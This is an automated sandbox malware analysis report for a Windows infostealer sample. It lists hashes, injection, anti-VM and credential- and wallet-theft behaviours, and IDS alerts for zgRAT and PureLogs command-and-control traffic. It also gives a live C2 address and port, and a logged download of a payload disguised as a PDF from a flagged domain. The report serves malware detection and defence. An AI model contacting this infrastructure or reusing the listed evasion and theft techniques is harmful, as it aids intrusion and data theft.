Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nEnq-0023HHHDDJKSS1000025.pif.exe

Overview

General Information

Sample name:nEnq-0023HHHDDJKSS1000025.pif.exe
Analysis ID:1689536
Has dependencies:false
MD5:09bb5446ad9055b9a1cb449db99a7302
SHA1:7f9a9739264146697a40ac00abf99eae6b3d1188
SHA256:5dbc967d7e4e57b628dfb12188836ba2c24e6a336c6f81ca625ff58ef491a8fc
Tags:exeuser-FXOLabs
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • nEnq-0023HHHDDJKSS1000025.pif.exe (PID: 892 cmdline: "C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe" MD5: 09BB5446AD9055B9A1CB449DB99A7302)
    • RegAsm.exe (PID: 7724 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • chrome.exe (PID: 7864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\ijysk4js.yew --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1b4f38,0x7ffc9d1b4f44,0x7ffc9d1b4f50 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 8056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 5900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=160482786 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155327286 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3088 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 5744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1747189763577284 --launch-time-ticks=155781375 --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:1 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\ijysk4js.yew" --no-pre-read-main-dll --field-trial-handle=2120,i,17547587415789425831,18257902359942624357,262144 --variations-seed-version --mojo-platform-channel-handle=2468 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1468133567.0000000003B12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1476454354.0000000005CE0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: nEnq-0023HHHDDJKSS1000025.pif.exe PID: 892JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: nEnq-0023HHHDDJKSS1000025.pif.exe PID: 892JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3b12660.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.5ce0000.9.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.5ce0000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.nEnq-0023HHHDDJKSS1000025.pif.exe.3b12660.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-05-14T04:31:58.416175+020020489021A Network Trojan was detected192.168.2.44972291.92.120.10162520TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-05-14T04:31:56.456247+020028610851Malware Command and Control Activity Detected192.168.2.44972291.92.120.10162520TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://www.new.eventawardsrussia.com/wp-includes/Ypeyqku.pdfAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted file
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeVirustotal: Detection: 26%Perma Link
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeReversingLabs: Detection: 24%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleNeural Call Log Analysis: 99.8%
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.4:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49754 version: TLS 1.2
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.0000000003594000.00000004.00000800.00020000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1472588568.0000000005350000.00000004.08000000.00040000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.0000000003594000.00000004.00000800.00020000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1472588568.0000000005350000.00000004.08000000.00040000.00000000.sdmp, nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1468133567.000000000380C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\adobeYolo.cssJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\assistantPopup.cssJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\Jump to behavior
                    Source: chrome.exeMemory has grown: Private usage: 0MB later: 67MB

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2861085 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.4:49722 -> 91.92.120.101:62520
                    Source: Network trafficSuricata IDS: 2048902 - Severity 1 - ET MALWARE [ANY.RUN] PureLogs Stealer C2 Connection M1 : 192.168.2.4:49722 -> 91.92.120.101:62520
                    Source: global trafficTCP traffic: 192.168.2.4:49722 -> 91.92.120.101:62520
                    Source: Joe Sandbox ViewIP Address: 5.23.51.54 5.23.51.54
                    Source: Joe Sandbox ViewASN Name: INETLTDTR INETLTDTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.120.101
                    Source: global trafficHTTP traffic detected: GET /wp-includes/Ypeyqku.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyuNTUbx63B6wMY&MD=cMd2RACN HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=134.0.6998.36&lang=en-GB&acceptformat=crx3,puff&x=id%3Defaidnbmnnnibpcajpcglclefindmkaj%26v%3D0.0.0.0%26installedby%3Dexternal%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dinternal%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1host: clients2.google.comx-goog-update-interactivity: fgx-goog-update-appid: efaidnbmnnnibpcajpcglclefindmkaj,ghbmnnjooekpmoecnnnilnnbdlolhkhi,nmmhkkegccagdldgiimedpiccmgmiedax-goog-update-updater: chromecrx-134.0.6998.36sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1host: www.google.comsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activeuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CNOVywE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1host: www.google.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1host: www.google.comx-client-data: CNOVywE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AR5vvTrJQX8o3yiAYG6sKMXlQIJkhUqWDOZZpkQIvZ8jdIlHo_-r-eEEvUfpiEjPeKJSMQSs6sUAg_iPrX6bF1LM5ZKoXL8s5lKqoV5XdDwl2S76g_QJo4kYFnGtCX3ltfS7AMZSmuUk0OfbOYBaoyXsXRiKixwOa7jJxw/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_5_2_0.crx HTTP/1.1host: clients2.googleusercontent.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.F939Du45chc.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8uI5v7Xlp-b-Z4Th_hAAVtm2lZOw/cb=gapi.loaded_0 HTTP/1.1host: apis.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CNOVywE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyuNTUbx63B6wMY&MD=cMd2RACN HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AR5vvTq3D5vfs1yj2BnXdOyoB_sQ4V5rAB-UVgv02BkAIKpatzFha6ZtTSHtDWl-MbrYwfWmX5Uql10vGXRnasmn8vq26kcwSL6jBHFK6iHJRnYYkOt80wyeiYX1aHekXxQAxlKa5fXo6vnABHtTfyBvsMKEcsxdW7Gh/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_91_1_0.crx HTTP/1.1host: clients2.googleusercontent.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /time/1/current?cup2key=8:SnjlZAUeVm6xtI_C2goXEgiCo07jXuLMeAGmhRwoAXk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1Host: clients2.google.comConnection: keep-alivePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate
                    Source: chrome.exe, 0000000A.00000003.1561169617.00002264013C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1561108260.0000226401424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1742843887.0000358400804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
